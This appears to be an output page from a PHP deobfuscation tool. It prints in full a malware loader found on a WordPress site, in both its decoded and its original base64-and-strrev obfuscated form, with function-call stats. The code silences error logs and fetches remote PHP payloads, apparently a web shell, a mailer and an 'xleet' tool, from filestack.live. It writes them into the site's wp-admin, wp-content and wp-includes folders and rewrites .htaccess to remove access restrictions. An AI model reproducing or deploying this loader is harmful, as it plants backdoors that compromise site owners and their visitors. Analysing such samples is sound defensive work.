Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $zwYGH = 'ba'.'se64'.'_de'.'code'; $zUdPu = 'st'.'rrev'; ini_set('error_log', NULL);..

Decoded Output download

 error_reporting(0); $p_olux = str_replace("../", "", "/www/wwwroot/ketquabongda.tw/wp-admin/ZMHotpLVIWT.php"); $p_mailer = str_replace("../", "", "/www/wwwroot/ketquabongda.tw/wp-content/KxUSMd1I6oR.php"); $p_xleet = str_replace("../", "", "/www/wwwroot/ketquabongda.tw/wp-includes/HUYS7y8IZfs.php"); $root = str_replace("../", "", "/www/wwwroot/ketquabongda.tw/"); function http_get_contents($url){$codex = file_get_contents($url);if (empty($codex)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);$urlPage = curl_exec($ch);curl_close($ch);return($urlPage);}else {return $codex;}} function save($path, $source){ if(function_exists("file_put_contents")){ file_put_contents($path, $source); }else { fwrite(fopen($path,"w"), $source); } } function read($path){ if(function_exists("file_get_contents")){ $rr = file_get_contents($path); }else { $rr = stream_get_contents(fopen($path, "r")); } return $rr; } if(!file_exists($p_olux)) { $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm"); if(preg_match("/<\?php/", $olux)){ save($p_olux, $olux); }  } if(!file_exists($p_xleet)) { $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm"); if(preg_match("/<\?php/", $xleet)){ save($p_xleet, $xleet); }  } if(!file_exists($p_mailer)) { $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm"); if(preg_match("/<\?php/", $mailer)){ $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "QkzBJwAthWb", $mailer); save($p_mailer, $mailer); }  } save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>"); $htx = strtolower(read($root.".htaccess")); if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) { $htx = "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php\$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>"; chmod($root.".htaccess", 0644); save($root.".htaccess", $htx); } 

Did this file decode correctly?

Original Code

<?php $zwYGH = 'ba'.'se64'.'_de'.'code'; $zUdPu = 'st'.'rrev'; ini_set('error_log', NULL); ini_set('log_errors', 0); ini_set('display_errors', 0); /*  ojqhrpf ub xm  */ error_reporting(0); eval($zUdPu($zwYGH('IH0gOyl4dGgkICwic3NlY2NhdGguIi50b29yJChldmFzIDspNDQ2MCAsInNzZWNjYXRoLiIudG9vciQoZG9taGMgOyI+ZWx1ZG9NZkkvPG5cXUxbIHBocC54ZWRuaS8gLiBlbHVSZXRpcndlUm5cZC0hIH1FTUFORUxJRl9UU0VVUUVSeyUgZG5vQ2V0aXJ3ZVJuXGYtISB9RU1BTkVMSUZfVFNFVVFFUnslIGRub0NldGlyd2VSblxdTFsgLSAkXHBocC5ceGVkbmleIGVsdVJldGlyd2VSblwvIGVzYUJldGlyd2VSblxuTyBlbmlnbkVldGlyd2VSblw+Yy5ldGlyd2VyX2RvbSBlbHVkb01mSTwiID0geHRoJCB7ICkpeHRoJCAsIi95bmVkKSouKHdvbGxhKSouKHJlZHJvLyIoaGN0YW1fZ2VycCB8fCApeHRoJCAsIi9sbGEpKi4obW9yZikqLih5bmVkLyIoaGN0YW1fZ2VycChmaSA7KSkic3NlY2NhdGguIi50b29yJChkYWVyKHJld29sb3RydHMgPSB4dGgkIDspIj5lbHRpdC88PmVsdGl0PD5sbXRoIEVQWVRDT0QhPCIgLCJsbXRoLnhlZG5pL3NlZHVsY25pLXB3Ii50b29yJChldmFzIH0gIH0gOylyZWxpYW0kICxyZWxpYW1fcCQoZXZhcyA7KXJlbGlhbSQgLCJiV2h0QXdKQnprUSIgLCJ4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eCIoZWNhbHBlcl9ydHMgPSByZWxpYW0kIHspKXJlbGlhbSQgLCIvcGhwP1w8LyIoaGN0YW1fZ2VycChmaSA7KSJtdGguYWIwOTM5MWRmNjljMzc1YTQ2OGQ3Y2E4OWZjNzNmOTcvZXZpbC5rY2F0c2VsaWYvLzpzcHR0aCIoc3RuZXRub2NfdGVnX3B0dGggPSByZWxpYW0kIHsgKSlyZWxpYW1fcCQoc3RzaXhlX2VsaWYhKGZpIH0gIH0gOyl0ZWVseCQgLHRlZWx4X3AkKGV2YXMgeykpdGVlbHgkICwiL3BocD9cPC8iKGhjdGFtX2dlcnAoZmkgOykibXRoLjM3ZGEwNGJmNmM5Y2M3NmE1YjQxOWMwY2RhM2U1OTkyL2V2aWwua2NhdHNlbGlmLy86cHR0aCIoc3RuZXRub2NfdGVnX3B0dGggPSB0ZWVseCQgeyApKXRlZWx4X3AkKHN0c2l4ZV9lbGlmIShmaSB9ICB9IDspeHVsbyQgLHh1bG9fcCQoZXZhcyB7KSl4dWxvJCAsIi9waHA/XDwvIihoY3RhbV9nZXJwKGZpIDspIm10aC4wYmFmMzhiZDI3MmE0NmRhMzdhMTUyMDA0MzBjOWVkNS9ldmlsLmtjYXRzZWxpZi8vOnB0dGgiKHN0bmV0bm9jX3RlZ19wdHRoID0geHVsbyQgeyApKXh1bG9fcCQoc3RzaXhlX2VsaWYhKGZpIH0gO3JyJCBucnV0ZXIgfSA7KSkiciIgLGh0YXAkKG5lcG9mKHN0bmV0bm9jX3RlZ19tYWVydHMgPSByciQgeyBlc2xlfSA7KWh0YXAkKHN0bmV0bm9jX3RlZ19lbGlmID0gcnIkIHspKSJzdG5ldG5vY190ZWdfZWxpZiIoc3RzaXhlX25vaXRjbnVmKGZpIHspaHRhcCQoZGFlciBub2l0Y251ZiB9IH0gOyllY3J1b3MkICwpInciLGh0YXAkKG5lcG9mKGV0aXJ3ZiB7IGVzbGV9IDspZWNydW9zJCAsaHRhcCQoc3RuZXRub2NfdHVwX2VsaWYgeykpInN0bmV0bm9jX3R1cF9lbGlmIihzdHNpeGVfbm9pdGNudWYoZmkgeyllY3J1b3MkICxodGFwJChldmFzIG5vaXRjbnVmIH19O3hlZG9jJCBucnV0ZXJ7IGVzbGV9OyllZ2FQbHJ1JChucnV0ZXI7KWhjJChlc29sY19scnVjOyloYyQoY2V4ZV9scnVjID0gZWdhUGxydSQ7KV0iVE5FR0FfUkVTVV9QVFRIIltSRVZSRVNfJCAsVE5FR0FSRVNVX1RQT0xSVUMgLGhjJCh0cG90ZXNfbHJ1YzspMDYgLFRVT0VNSVRfVFBPTFJVQyAsaGMkKHRwb3Rlc19scnVjOykwNiAsVFVPRU1JVFRDRU5OT0NfVFBPTFJVQyAsaGMkKHRwb3Rlc19scnVjOykwICxUU09IWUZJUkVWX0xTU19UUE9MUlVDICxoYyQodHBvdGVzX2xydWM7KTAgLFJFRVBZRklSRVZfTFNTX1RQT0xSVUMgLGhjJCh0cG90ZXNfbHJ1YzspMSAsUkVGU05BUlROUlVURVJfVFBPTFJVQyAsaGMkKHRwb3Rlc19scnVjOykxICxOT0lUQUNPTFdPTExPRl9UUE9MUlVDICxoYyQodHBvdGVzX2xydWMgOykwICxSRURBRUhfVFBPTFJVQyAsaGMkKHRwb3Rlc19scnVjOylscnUkICxMUlVfVFBPTFJVQyAsaGMkKHRwb3Rlc19scnVjOykodGluaV9scnVjID0gaGMkeykpeGVkb2MkKHl0cG1lKCBmaTspbHJ1JChzdG5ldG5vY190ZWdfZWxpZiA9IHhlZG9jJHspbHJ1JChzdG5ldG5vY190ZWdfcHR0aCBub2l0Y251ZiA7KSIvd3QuYWRnbm9iYXVxdGVrL3Rvb3J3d3cvd3d3LyIgLCIiICwiLy4uIihlY2FscGVyX3J0cyA9IHRvb3IkIDspInBocC5zZlpJOHk3U1lVSC9zZWR1bGNuaS1wdy93dC5hZGdub2JhdXF0ZWsvdG9vcnd3dy93d3cvIiAsIiIgLCIvLi4iKGVjYWxwZXJfcnRzID0gdGVlbHhfcCQgOykicGhwLlJvNkkxZE1TVXhLL3RuZXRub2MtcHcvd3QuYWRnbm9iYXVxdGVrL3Rvb3J3d3cvd3d3LyIgLCIiICwiLy4uIihlY2FscGVyX3J0cyA9IHJlbGlhbV9wJCA7KSJwaHAuVFdJVkxwdG9ITVovbmltZGEtcHcvd3QuYWRnbm9iYXVxdGVrL3Rvb3J3d3cvd3d3LyIgLCIiICwiLy4uIihlY2FscGVyX3J0cyA9IHh1bG9fcCQgOykwKGduaXRyb3Blcl9yb3JyZSA='))); ?>

Function Calls

strrev 1
ini_set 3
base64_decode 1
error_reporting 1

Variables

$zUdPu strrev
$zwYGH base64_decode

Stats

MD5 492f0c51d768ea8c6fd43a1754afb227
Eval Count 1
Decode Time 81 ms